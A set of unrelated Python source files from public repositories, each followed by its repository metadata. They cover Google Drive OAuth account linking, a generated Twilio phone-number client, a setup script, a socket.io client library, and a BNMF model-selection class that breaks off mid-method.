auth_flow = OAuth2WebServerFlow(settings.GOOGLE_DRIVE_CLIENT_ID, settings.GOOGLE_DRIVE_CLIENT_SECRET,
settings.GOOGLE_DRIVE_OAUTH_SCOPE, settings.GOOGLE_DRIVE_REDIRECT_URI,
approval_prompt='force', access_type='offline')
return auth_flow
def auth_init(self, request):
auth_flow = self.get_flow(request)
flow_model = models.GoogleAuth()
flow_model.flow = auth_flow
flow_model.id = request.user
flow_model.save()
authorize_url = auth_flow.step1_get_authorize_url()
return Response({'authorize_url': authorize_url}, status=status.HTTP_200_OK)
def auth_end(self, request):
from oauth2client.django_orm import Storage
from apiclient.discovery import build
auth_flow = models.GoogleAuth.objects.get(id=request.user).flow
credentials = auth_flow.step2_exchange(request.data.get('code'))
http = httplib2.Http()
http = credentials.authorize(http)
drive_service = build('drive', 'v2', http=http)
try:
account_info = drive_service.about().get().execute()
user_info = account_info['user']
quota_info = account_info['quotaBytesByService']
drive_quota = [drive['bytesUsed'] for drive in quota_info if drive['serviceName'] == 'DRIVE']
drive_bytes_used = drive_quota.pop()
quota_bytes_total = account_info['quotaBytesTotal']
try:
account_check = models.ExternalAccount.objects.get(type='GOOGLEDRIVE', email=user_info['emailAddress'])
account_check.is_active = 1
account_check.status = 1
account_check.save()
except models.ExternalAccount.DoesNotExist:
account = models.ExternalAccount()
account.owner = request.user
account.email = user_info['emailAddress']
account.access_token = credentials.to_json()
account.description = user_info['displayName'] + '(' + user_info['emailAddress'] + ')'
account.type = 'GOOGLEDRIVE'
account.quota = quota_bytes_total
account.assigned_space = quota_bytes_total
account.used_space = drive_bytes_used
account.is_active = 1
body = {
'title': 'crowdresearch',
'mimeType': 'application/vnd.google-apps.folder'
}
account.root = drive_service.files().insert(body=body).execute()['id']
account.name = 'Google Drive'
account.status = 1
account.save()
storage = Storage(models.GoogleCredential, 'account', account, 'credential')
storage.put(credentials)
except Exception:
Response({"message": "Failed to add account, please retry"}, status.HTTP_400_BAD_REQUEST)
return Response({"message": "OK"}, status.HTTP_201_CREATED)
class GoogleDriveViewSet(ViewSet):
permission_classes = [IsAuthenticated]
def query(self, request):
file_name = request.query_params.get('path')
files = file_name.split('/')
account = models.ExternalAccount.objects.get(owner=request.user, type='GOOGLEDRIVE')
root = account.root
drive_util = GoogleDriveUtil(account_instance=account)
file_list = []
for file in files:
file_list = drive_util.list_files_in_folder(root, "title = '" + file + "'")
root = file_list[0]['id']
return Response(file_list, 200)
class GoogleDriveUtil(object):
def __init__(self, account_instance):
credential_model = models.GoogleCredential.objects.get(account=account_instance)
get_credential = credential_model.credential
http = httplib2.Http()
http = get_credential.authorize(http)
drive_service = discovery.build('drive', 'v2', http=http)
self.drive_service = drive_service
def list_files_in_folder(self, folder_id, q):
# TODO filter by q
file_list = []
page_token = None
while True:
try:
params = {}
if page_token:
params['pageToken'] = page_token
params['q'] = q
children = self.drive_service.children().list(folderId=folder_id, **params).execute()
for child in children.get('items', []):
file_list.append(self.drive_service.files().get(fileId=child['id']).execute())
page_token = children.get('nextPageToken')
if not page_token:
break
except errors.HttpError as error:
message = 'An error occurred: ' + error.content
return message
return file_list
def search_file(self, account_instance, file_title):
root_id = models.GoogleCredential.objects.get(account=account_instance).account.root
parent_id = self.getPathId(root_id) # get the id of the parent folder
query = str(parent_id) + ' in parents and title=' + file_title
contents = self.list_files_in_folder(parent_id, query)
return contents
def create_folder(self, title, parent_id='', mime_type='application/vnd.google-apps.folder'):
body = {
'title': title,
'mimeType': mime_type
}
if parent_id:
body['parents'] = [{'id': parent_id}]
try:
file = self.drive_service.files().insert(body=body).execute()
return file
except errors.HttpError:
return None
def insert(self, file_name, title, parent_id=[], mime_type='application/octet-stream', resumable=True):
media_body = MediaFileUpload(file_name, mimetype=mime_type, resumable=resumable)
body = {
'title': title,
'mimeType': mime_type
}
if parent_id:
body['parents'] = [{'id': parent_id}]
try:
file = self.drive_service.files().insert(body=body, media_body=media_body).execute()
return file
except errors.HttpError:
return None
def update(self, file_id, new_revision, new_filename, mime_type='application/octet-stream'):
try:
# First retrieve the file from the API.
file = self.drive_service.files().get(fileId=file_id).execute()
# File's new content.
media_body = MediaFileUpload(new_filename, mimetype=mime_type, resumable=True)
# Send the request to the API.
updated_file = self.drive_service.files().update(
fileId=file_id,
body=file,
newRevision=new_revision,
media_body=media_body).execute()
return updated_file
except errors.HttpError:
return None
def trash(self, file_id):
try:
return self.drive_service.files().trash(fileId=file_id).execute()
except errors.HttpError as error:
return str(error)
def untrash(self, file_id):
try:
return self.drive_service.files().untrash(fileId=file_id).execute()
except errors.HttpError:
return None
def delete(self, file_id):
try:
return self.drive_service.files().delete(fileId=file_id).execute()
except errors.HttpError:
return None
def download(self, file_id):
file = None
try:
file = self.drive_service.files().get(fileId=file_id).execute()
except errors.HttpError:
return None
download_url = file.get('downloadUrl')
if download_url:
resp, content = self.drive_service._http.request(download_url)
if resp.status == 200:
return content
else:
return None
else:
return None
def get(self, file_id):
try:
file = self.drive_service.files().get(fileId=file_id).execute()
return file
except errors.HttpError:
return None
def get_account_info(self):
account_info = self.drive_service.about().get().execute()
return account_info
| {
"content_hash": "9c6a8a5f691f6f667c49176744bd286f",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 119,
"avg_line_length": 40.08071748878924,
"alnum_prop": 0.5883866636831506,
"repo_name": "shirishgoyal/crowdsource-platform",
"id": "d635e78a3a28894d921abe370a62bd27277ec4ce",
"size": "8938",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop2",
"path": "crowdsourcing/viewsets/google_drive.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "63075"
},
{
"name": "HTML",
"bytes": "229504"
},
{
"name": "JavaScript",
"bytes": "312581"
},
{
"name": "Python",
"bytes": "748797"
},
{
"name": "Shell",
"bytes": "838"
}
],
"symlink_target": ""
} |
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class MobileList(ListResource):
def __init__(self, version, account_sid, country_code):
"""
Initialize the MobileList
:param Version version: Version that contains the resource
:param account_sid: The 34 character string that uniquely identifies your account.
:param country_code: The ISO Country code to lookup phone numbers for.
:returns: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileList
:rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileList
"""
super(MobileList, self).__init__(version)
# Path Solution
self._solution = {
'account_sid': account_sid,
'country_code': country_code,
}
self._uri = '/Accounts/{account_sid}/AvailablePhoneNumbers/{country_code}/Mobile.json'.format(**self._solution)
def stream(self, area_code=values.unset, contains=values.unset,
sms_enabled=values.unset, mms_enabled=values.unset,
voice_enabled=values.unset,
exclude_all_address_required=values.unset,
exclude_local_address_required=values.unset,
exclude_foreign_address_required=values.unset, beta=values.unset,
near_number=values.unset, near_lat_long=values.unset,
distance=values.unset, in_postal_code=values.unset,
in_region=values.unset, in_rate_center=values.unset,
in_lata=values.unset, limit=None, page_size=None):
"""
Streams MobileInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode area_code: The area_code
:param unicode contains: The contains
:param bool sms_enabled: The sms_enabled
:param bool mms_enabled: The mms_enabled
:param bool voice_enabled: The voice_enabled
:param bool exclude_all_address_required: The exclude_all_address_required
:param bool exclude_local_address_required: The exclude_local_address_required
:param bool exclude_foreign_address_required: The exclude_foreign_address_required
:param bool beta: The beta
:param unicode near_number: The near_number
:param unicode near_lat_long: The near_lat_long
:param unicode distance: The distance
:param unicode in_postal_code: The in_postal_code
:param unicode in_region: The in_region
:param unicode in_rate_center: The in_rate_center
:param unicode in_lata: The in_lata
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
area_code=area_code,
contains=contains,
sms_enabled=sms_enabled,
mms_enabled=mms_enabled,
voice_enabled=voice_enabled,
exclude_all_address_required=exclude_all_address_required,
exclude_local_address_required=exclude_local_address_required,
exclude_foreign_address_required=exclude_foreign_address_required,
beta=beta,
near_number=near_number,
near_lat_long=near_lat_long,
distance=distance,
in_postal_code=in_postal_code,
in_region=in_region,
in_rate_center=in_rate_center,
in_lata=in_lata,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, area_code=values.unset, contains=values.unset,
sms_enabled=values.unset, mms_enabled=values.unset,
voice_enabled=values.unset, exclude_all_address_required=values.unset,
exclude_local_address_required=values.unset,
exclude_foreign_address_required=values.unset, beta=values.unset,
near_number=values.unset, near_lat_long=values.unset,
distance=values.unset, in_postal_code=values.unset,
in_region=values.unset, in_rate_center=values.unset,
in_lata=values.unset, limit=None, page_size=None):
"""
Lists MobileInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode area_code: The area_code
:param unicode contains: The contains
:param bool sms_enabled: The sms_enabled
:param bool mms_enabled: The mms_enabled
:param bool voice_enabled: The voice_enabled
:param bool exclude_all_address_required: The exclude_all_address_required
:param bool exclude_local_address_required: The exclude_local_address_required
:param bool exclude_foreign_address_required: The exclude_foreign_address_required
:param bool beta: The beta
:param unicode near_number: The near_number
:param unicode near_lat_long: The near_lat_long
:param unicode distance: The distance
:param unicode in_postal_code: The in_postal_code
:param unicode in_region: The in_region
:param unicode in_rate_center: The in_rate_center
:param unicode in_lata: The in_lata
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance]
"""
return list(self.stream(
area_code=area_code,
contains=contains,
sms_enabled=sms_enabled,
mms_enabled=mms_enabled,
voice_enabled=voice_enabled,
exclude_all_address_required=exclude_all_address_required,
exclude_local_address_required=exclude_local_address_required,
exclude_foreign_address_required=exclude_foreign_address_required,
beta=beta,
near_number=near_number,
near_lat_long=near_lat_long,
distance=distance,
in_postal_code=in_postal_code,
in_region=in_region,
in_rate_center=in_rate_center,
in_lata=in_lata,
limit=limit,
page_size=page_size,
))
def page(self, area_code=values.unset, contains=values.unset,
sms_enabled=values.unset, mms_enabled=values.unset,
voice_enabled=values.unset, exclude_all_address_required=values.unset,
exclude_local_address_required=values.unset,
exclude_foreign_address_required=values.unset, beta=values.unset,
near_number=values.unset, near_lat_long=values.unset,
distance=values.unset, in_postal_code=values.unset,
in_region=values.unset, in_rate_center=values.unset,
in_lata=values.unset, page_token=values.unset,
page_number=values.unset, page_size=values.unset):
"""
Retrieve a single page of MobileInstance records from the API.
Request is executed immediately
:param unicode area_code: The area_code
:param unicode contains: The contains
:param bool sms_enabled: The sms_enabled
:param bool mms_enabled: The mms_enabled
:param bool voice_enabled: The voice_enabled
:param bool exclude_all_address_required: The exclude_all_address_required
:param bool exclude_local_address_required: The exclude_local_address_required
:param bool exclude_foreign_address_required: The exclude_foreign_address_required
:param bool beta: The beta
:param unicode near_number: The near_number
:param unicode near_lat_long: The near_lat_long
:param unicode distance: The distance
:param unicode in_postal_code: The in_postal_code
:param unicode in_region: The in_region
:param unicode in_rate_center: The in_rate_center
:param unicode in_lata: The in_lata
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of MobileInstance
:rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobilePage
"""
params = values.of({
'AreaCode': area_code,
'Contains': contains,
'SmsEnabled': sms_enabled,
'MmsEnabled': mms_enabled,
'VoiceEnabled': voice_enabled,
'ExcludeAllAddressRequired': exclude_all_address_required,
'ExcludeLocalAddressRequired': exclude_local_address_required,
'ExcludeForeignAddressRequired': exclude_foreign_address_required,
'Beta': beta,
'NearNumber': near_number,
'NearLatLong': near_lat_long,
'Distance': distance,
'InPostalCode': in_postal_code,
'InRegion': in_region,
'InRateCenter': in_rate_center,
'InLata': in_lata,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return MobilePage(self._version, response, self._solution)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.MobileList>'
class MobilePage(Page):
def __init__(self, version, response, solution):
"""
Initialize the MobilePage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: The 34 character string that uniquely identifies your account.
:param country_code: The ISO Country code to lookup phone numbers for.
:returns: twilio.rest.api.v2010.account.available_phone_number.mobile.MobilePage
:rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobilePage
"""
super(MobilePage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of MobileInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance
:rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance
"""
return MobileInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
country_code=self._solution['country_code'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.MobilePage>'
class MobileInstance(InstanceResource):
def __init__(self, version, payload, account_sid, country_code):
"""
Initialize the MobileInstance
:returns: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance
:rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance
"""
super(MobileInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'friendly_name': payload['friendly_name'],
'phone_number': payload['phone_number'],
'lata': payload['lata'],
'rate_center': payload['rate_center'],
'latitude': deserialize.decimal(payload['latitude']),
'longitude': deserialize.decimal(payload['longitude']),
'region': payload['region'],
'postal_code': payload['postal_code'],
'iso_country': payload['iso_country'],
'address_requirements': payload['address_requirements'],
'beta': payload['beta'],
'capabilities': payload['capabilities'],
}
# Context
self._context = None
self._solution = {
'account_sid': account_sid,
'country_code': country_code,
}
@property
def friendly_name(self):
"""
:returns: The friendly_name
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def phone_number(self):
"""
:returns: The phone_number
:rtype: unicode
"""
return self._properties['phone_number']
@property
def lata(self):
"""
:returns: The lata
:rtype: unicode
"""
return self._properties['lata']
@property
def rate_center(self):
"""
:returns: The rate_center
:rtype: unicode
"""
return self._properties['rate_center']
@property
def latitude(self):
"""
:returns: The latitude
:rtype: unicode
"""
return self._properties['latitude']
@property
def longitude(self):
"""
:returns: The longitude
:rtype: unicode
"""
return self._properties['longitude']
@property
def region(self):
"""
:returns: The region
:rtype: unicode
"""
return self._properties['region']
@property
def postal_code(self):
"""
:returns: The postal_code
:rtype: unicode
"""
return self._properties['postal_code']
@property
def iso_country(self):
"""
:returns: The iso_country
:rtype: unicode
"""
return self._properties['iso_country']
@property
def address_requirements(self):
"""
:returns: The address_requirements
:rtype: unicode
"""
return self._properties['address_requirements']
@property
def beta(self):
"""
:returns: The beta
:rtype: bool
"""
return self._properties['beta']
@property
def capabilities(self):
"""
:returns: The capabilities
:rtype: unicode
"""
return self._properties['capabilities']
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.MobileInstance>'
| {
"content_hash": "53ba91804e62fb55d3bc8392d9c716c8",
"timestamp": "",
"source": "github",
"line_count": 423,
"max_line_length": 119,
"avg_line_length": 38.22458628841608,
"alnum_prop": 0.6117261426185912,
"repo_name": "angadpc/Alexa-Project-",
"id": "dd260f701aabb543b1cf460c0daa4c1d34a35761",
"size": "16184",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "twilio/rest/api/v2010/account/available_phone_number/mobile.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3097013"
},
{
"name": "Shell",
"bytes": "93"
}
],
"symlink_target": ""
} |
from setuptools import setup
import os
import sys
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
if sys.version_info < (3,3):
requires = ['mock'] # for python2 and python < 3.3
else:
requires = [] # for >= python3.3
else:
# Place install_requires into the text file "requirements.txt"
with open(os.path.join(here, 'requirements.txt'), encoding='utf-8') as f2:
requires = f2.read().strip().splitlines()
setup(name='computer',
version='0.1',
description='Abstraction for performing tasks on servers.',
url='http://github.com/jrising/computer',
author='James Rising',
author_email='jarising@gmail.com',
license='GNU v. 3',
packages=['computer'],
zip_safe=False)
| {
"content_hash": "8c2779b9a851c5cf53843792106590a5",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 78,
"avg_line_length": 30.84,
"alnum_prop": 0.62905317769131,
"repo_name": "jrising/computer",
"id": "62669192bb5e6848f00d7edbca681f5c42f00033",
"size": "771",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "33383"
}
],
"symlink_target": ""
} |
from Queue import Queue
from threading import _Event, Thread
from urlparse import urlparse
from functools import partial
from socketIO_client import SocketIO, SocketIONamespace, EngineIONamespace
from exceptions import HeimdallrClientException
from utils import timestamp, for_own_methods, on_ready
from settings import AUTH_SOURCE, URL
__all__ = ['Client', 'Provider', 'Consumer']
def _init(self, io):
self._io = io
self._callback_by_event = {}
self._log_name = Client._url
self.initialize()
EngineIONamespace.__init__ = _init
class _SocketIO(SocketIO):
def _should_stop_waiting(self, **kwargs):
event = kwargs.pop('event', None)
event_set = False
if isinstance(event, _Event):
event_set = event.is_set()
return super(_SocketIO, self)._should_stop_waiting(**kwargs) or \
event_set
class Client():
"""
The ``Client`` class provides most of the behavior for
Heimdallr clients. However, it is not intended to be
used directly. The ``Client`` constructor creates the
basic connection which in this case is a
``SocketIONamespace``. It sets up callbacks for
connection and authentication as well as a default
callback for errors. The default error handler can be
removed by ``client.remove_listener('err')``.
Args:
token (str): Authentication token
"""
_url = URL
_auth_source = AUTH_SOURCE
_namespace = '/'
_safe = True
def __init__(self, token):
self.ready = False
self.ready_callbacks = []
self.callbacks = {}
self.token = token
self.connection = SocketIONamespace(None, self._namespace)
# Handle sending packets asynchronously
self._emit_queue = Queue()
self._emit_worker = Thread(target=self._emit_task)
self._emit_worker.daemon = True
self._emit_worker.start()
emit = self.connection.emit
def safe_emit(*args, **kwargs):
try:
emit(*args, **kwargs)
except Exception as e:
print (
'HeimdallrClient failed to send. Original exception: %s'
% e.message
)
if self._safe:
self.connection.emit = safe_emit
@self.on('err')
def fn(err):
if 'message' in err:
raise HeimdallrClientException(err['message'])
else:
raise HeimdallrClientException(err)
@self.on('auth-success')
def fn(*args):
self.ready = True
while self.ready_callbacks:
self.ready_callbacks.pop(0)()
def on_connect(*args):
self._emit_queue.put((
'authorize',
{'token': self.token, 'authSource': self._auth_source}
))
self.on('connect', on_connect)
self.on('reconnect', on_connect)
def __del__(self):
# Cleanup thread
self._emit_worker._Thread__stop()
def connect(self, **kwargs):
""" Connect to the Heimdallr server.
The ``connect`` method blocks until the the socket connection
to the server has been established.
Args:
**kwargs: Passed to underlying SocketIO constructor
:returns: :class:`Client <Client>`
"""
try:
parsed = urlparse(self._url)
if self.connection._io and self.connection._io.connected:
self.connection.disconnect()
self.connection._io = _SocketIO(
'%s://%s' % (parsed.scheme, parsed.hostname),
parsed.port,
**kwargs
)
io = self.connection._io
io._namespace = self.connection
io._namespace_by_path[self._namespace] = self.connection
io.connect(self._namespace)
io.wait(for_connect=True)
except Exception as e:
if not self._safe:
raise e
print 'HeimdallrClient failed to connect: %s' % e.message
return self
def run(self, seconds=None, **kwargs):
""" Main loop for a client.
The ``run`` method is the main loop for a client and is where
all communication between the Heimdallr server and client
takes place. The ``run`` method is just a proxy for the
``SocketIO.wait`` method so you can call it with the
same arguments. However, an additional ``event`` option has
been added. If a :py:class:`threading.Event` object is passed in for
``event``, the wait loop will terminate once the flag is set.
Args:
seconds (float): Number of seconds to loop for
event (:py:class:`threading.Event`): Triggers the exit of the run
loop when the flag is set
for_connect (bool): Run until the SocketIO connect event
for_callback (bool): Run until the server has acknowledged all
emits
:returns: :class:`Client <Client>`
**Usage:**
.. code-block:: python
client.run(1) # Loops for 1 second
from threading import Event
event = Event()
client.run(event=event) # Loops until event.is_set() is True
client.run() # Loops forever
"""
kwargs['seconds'] = seconds
self.connection._io.wait(**kwargs)
return self
def _emit_task(self):
while True:
args = self._emit_queue.get()
self.connection.emit(*args)
def __trigger_callbacks(self, message_name, *args):
""" Call all of the callbacks for a socket.io message.
A version of this method curried with ``message_name``
is given to the underlying ``SocketIONamespace``. When the
``SocketIONamespace`` calls it each of the callbacks that
have been attached to ``message_name`` will be called.
Args:
message_name (str): Name of the socket.io message to listen for
args: Data sent with message
"""
callbacks = self.callbacks.get(message_name, [])
for callback in callbacks:
callback(*args)
def __on(self, message_name, callback):
""" Store ``callback`` and register a placeholder callback.
Appends ``callback`` to the list of callbacks for the
given ``message_name``. Also assigns a placeholder
callback to the underlying ``SocketIONamespace`` so that
the placeholder can call all of the callbacks in
the list.
Args:
message_name (str): Name of the socket.io message to listen for
callback (function): Callback to be run when the socket.io message
is heard
"""
self.callbacks.setdefault(message_name, [])
self.callbacks[message_name].append(callback)
self.connection.on(
message_name,
partial(self.__trigger_callbacks, message_name)
)
def on(self, message_name, callback=None):
""" Add a socket.io message listener.
The ``on`` method will add a callback for socket.io messages
of the specified message name. Multiple callbacks can be
added for the same message name. They will be triggered
in the order in which they were added. This method can be
called outright or it can be used as a decorator.
Args:
message_name (str): Name of the socket.io message to listen for
callback (function): Callback to run when the socket.io
message is heard
:returns: :class:`Client <Client>`
**Usage:**
.. code-block:: python
def first(*args):
print 'FIRST'
client.on('myMessage', first)
@client.on('myMessage')
def second(*args):
print 'SECOND'
"""
# Decorator syntax
if callback is None:
def decorator(fn):
self.__on(message_name, fn)
return decorator
# SocketIO-Client syntax
self.__on(message_name, callback)
return self
def remove_listener(self, message_name, callback=None):
""" Remove listener for socket.io message.
If ``callback`` is specified, only the callbacks registered
for ``message_name`` that match ``callback`` will be removed.
If only ``message_name`` is specified, all of the callbacks
will be removed.
Args:
message_name (str): Name of the socket.io message to remove
callback (function): Specific callback to remove
:returns: :class:`Client <Client>`
"""
if callback:
while callback in self.callbacks.get(message_name, []):
self.callbacks[message_name].remove(callback)
else:
self.callbacks.pop(message_name, None)
self.connection._callback_by_event.pop(message_name, None)
return self
@for_own_methods(on_ready)
class Provider(Client):
"""
This class should be used to create a Heimdallr provider.
It inherits most of its functionality but it also
automatically connects to the provider namespace and
provides some convenience functions.
"""
_namespace = '/provider'
def send_event(self, subtype, data=None):
""" Emit a Heimdallr event packet.
This will send a Heimdallr event packet to the
Heimdallr server where it will be rebroadcast.
``data`` must adhere to the provider's schema for
the given ``subtype``.
Args:
subtype (str): The event packet subtype
data: The event packet data
:returns: :class:`Provider <Provider>`
"""
self._emit_queue.put((
'event',
{'subtype': subtype, 'data': data, 't': timestamp()}
))
def send_sensor(self, subtype, data=None):
""" Emit a Heimdallr sensor packet.
This will send a Heimdallr sensor packet to the
Heimdallr server where it will be rebroadcast.
``data`` must adhere to the provider's schema for
the given ``subtype``.
Args:
subtype (str): The sensor packet subtype
data: The sensor packet data
:returns: :class:`Provider <Provider>`
"""
self._emit_queue.put((
'sensor',
{'subtype': subtype, 'data': data, 't': timestamp()}
))
def send_stream(self, data):
""" Send binary data to the Heimdallr server.
This should only be used when the Heimdallr server
has issued a ``{'stream': 'start'}`` control packet
and should stop being used when the Heimdallr
server issues a ``{'stream': 'start'}`` control
packet.
Args:
data: The binary data to be sent.
:returns: :class:`Provider <Provider>`
"""
self._emit_queue.put((
'stream',
bytearray(data)
))
def completed(self, uuid):
""" Signal the Heimdallr server that a control has been completed.
This should be used when a control that has a persistent
field set to ``uuid`` has been completed.
Args:
uuid (str): UUID of the persistent control packet that has been
completed
:returns: :class:`Provider <Provider>`
"""
self._emit_queue.put((
'event',
{'subtype': 'completed', 'data': uuid, 't': timestamp()}
))
@for_own_methods(on_ready)
class Consumer(Client):
"""
This class should be used to create a Heimdallr consumer.
It inherits most of its functionality but it also
automatically connects to the consumer namespace and
provides some convenience functions.
"""
_namespace = '/consumer'
def send_control(self, uuid, subtype, data=None, persistent=False):
""" Emit a Heimdallr control packet.
This will send a control to the provider specified by
``uuid``. ``data`` must adhere to the provider's schema
for the given ``subtype``. If `persistent` is ``True``,
the control packet will be sent immediately and then
again every time the provider connects until the
provider signals the Heimdallr server that it has
completed the control.
Args:
uuid (str): UUID of the provider to send the control packet to
subtype (str): The control packet subtype
data: The control packet data
persistent (bool): Whether or not the control should persist
:returns: :class:`Consumer <Consumer>`
"""
self._emit_queue.put((
'control',
{
'provider': uuid,
'subtype': subtype,
'data': data,
'persistent': persistent
}
))
def subscribe(self, uuid):
""" Subscribe to a provider.
A consumer must subscribe to a provider before it
receives event or sensor packets from the provider
or can send control packets to the provider.
Args:
uuid (str): UUID of the provider to subscribe to
:returns: :class:`Consumer <Consumer>`
"""
self._emit_queue.put((
'subscribe',
{'provider': uuid}
))
def unsubscribe(self, uuid):
""" Unsubscribe from a provider.
The consumer will no longer receive packets from the
provider or be able to send it controls. This will
be done automatically by the Heimdallr server on
disconnect.
Args:
uuid (str): UUID of the provider to subscribe to
:returns: :class:`Consumer <Consumer>`
"""
self._emit_queue.put((
'unsubscribe',
{'provider': uuid}
))
def set_filter(self, uuid, filter_):
""" Control which event and sensor subtypes to hear from provider.
Set which packet subtypes you want to hear from the provider.
`filter` should be a dictionary with the keys `event` and/or
`sensor`. The value of those fields should be an array of
strings of the subtypes that you want to hear for the
provider given by `uuid`.
Args:
uuid (str): UUID of the provider to filter packets from
filter_ (dict): Dictionary containing event and/or sensor packet
subtypes that you want to receive
:returns: :class:`Consumer <Consumer>`
"""
filter_['provider'] = uuid
self._emit_queue.put((
'setFilter',
filter_
))
def get_state(self, uuid, subtypes):
""" Get the current state of a provider.
For each event packet subtype in `subtypes`, the most recent
event packet of that subtype will be sent to the consumer by
the Heimdallr server.
Args:
uuid (str): UUID of the provider to get the state of
subtypes (list): Event subtypes to get the state of
:returns: :class:`Consumer <Consumer>`
"""
self._emit_queue.put((
'getState',
{'provider': uuid, 'subtypes': subtypes}
))
def join_stream(self, uuid):
""" Join binary data stream from a provider.
If this is the first consumer to join the stream of
a provider, the Heimdallr server will send a
``{'stream': 'start'}`` control packet to the provider.
Args:
uuid (str): UUID of the provider to join the stream of
:returns: :class:`Consumer <Consumer>`
"""
self._emit_queue.put((
'joinStream',
{'provider': uuid}
))
def leave_stream(self, uuid):
""" Leave binary data stream for a provider.
If this is the last consumer to leave the stream for a
provider the Heimdallr server will send a
``{'stream': 'stop'}`` control packet to the provider.
This will be done automatically by the Heimdallr server
on disconnect.
Args:
uuid (str): UUID of the provider to leave the stream of
:returns: :class:`Consumer <Consumer>`
"""
self._emit_queue.put((
'leaveStream',
{'provider': uuid}
)) | {
"content_hash": "c1357c0580f28fcc23691a5606eebcb2",
"timestamp": "",
"source": "github",
"line_count": 536,
"max_line_length": 78,
"avg_line_length": 30.94776119402985,
"alnum_prop": 0.5775862068965517,
"repo_name": "ElementRobot/py-heimdallr-client",
"id": "5c94f39e8ab9a11719332ed96050488fd831080a",
"size": "16588",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heimdallr_client/clients.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "3794"
},
{
"name": "Python",
"bytes": "30804"
}
],
"symlink_target": ""
} |
"""
Class for doing model selection for BNMF, minimising the BIC, AIC, or MSE.
We expect the following arguments:
- classifier - a class for BNMF, with methods:
__init__(R,M,K,priors),
initialise(initUV),
run(iterations),
quality(metric) - metric in ['AIC','BIC','loglikelihood','MSE']
or quality(metric,burn_in,thinning) for Gibbs
- values_K - a list of values for K
- R - the dataset
- M - the mask matrix
- prior - the prior values for BNMF. This should be a dictionary of the form:
{ 'alpha':alpha, 'beta':beta, 'lambdaU':lambdaU, 'lambdaV':lambdaV }
where lambdaU and lambdaV are a single value.
- initUV - the initialisation of U and V - either 'exp' or 'random'
- iterations - number of iterations to run
- restarts - we run the classifier this many times and use the one with
the highest log likelihood
The line search can be started by running search().
If we use Gibbs then we run search(burn_in=<>,thinning=<>).
If we use ICM then we use run_search(minimum_TN=<>)
After that, the values for each metric ('BIC','AIC','loglikelihood','MSE') can
be obtained using all_values(metric), and the best value of K can be returned
using best_value(metric).
"""
metrics = ['BIC','AIC','loglikelihood','MSE','ELBO']
class LineSearch:
def __init__(self,classifier,values_K,R,M,priors,initUV,iterations,restarts=1):
self.classifier = classifier
self.values_K = values_K
self.R = R
self.M = M
(self.I,self.J) = self.R.shape
self.priors = priors
self.initUV = initUV
self.iterations = iterations
self.restarts = restarts
assert self.restarts > 0, "Need at least 1 restart."
self.all_performances = {
metric : []
for metric in metrics
}
def search(self,burn_in=None,thinning=None,minimum_TN=None):
for K in self.values_K:
print "Running line search for BNMF. Trying K = %s." % K
best_BNMF = None
for r in range(0,self.restarts):
print "Restart %s for K = %s." % (r+1,K)
BNMF = self.classifier(self.R,self.M,K,self.priors)
BNMF.initialise(init=self.initUV)
if minimum_TN is None:
BNMF.run(iterations=self.iterations)
else:
